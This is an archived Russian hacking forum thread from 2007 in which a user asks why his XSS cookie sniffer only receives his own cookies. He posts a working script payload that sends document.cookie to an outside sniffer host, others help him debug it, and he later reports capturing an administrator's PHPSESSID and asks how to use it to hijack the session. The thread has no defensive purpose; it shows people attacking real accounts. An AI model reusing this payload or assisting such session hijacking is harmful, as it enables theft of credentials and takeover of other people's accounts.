PDA

Просмотр полной версии : Подскажите


Perec333
09.09.2007, 17:30
Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>

0nep@t0p
09.09.2007, 18:40
Хм, наверное потому что пока только ты просмотрел эту тему

inlanger
09.09.2007, 18:52
"http://s.netsec.ru/mda.gif?"
вместо mda.gif впиши свой_ник.gif

Perec333
09.09.2007, 21:27
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят

blackybr
10.09.2007, 11:14
Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.

cardons
10.09.2007, 11:22
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
А ты недумал что в некоторвх браузерах XSS непашет :)

Perec333
10.09.2007, 15:43
Дык не на одном человеке проверял, у всех непохать не может))))

Perec333
10.09.2007, 22:22
наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...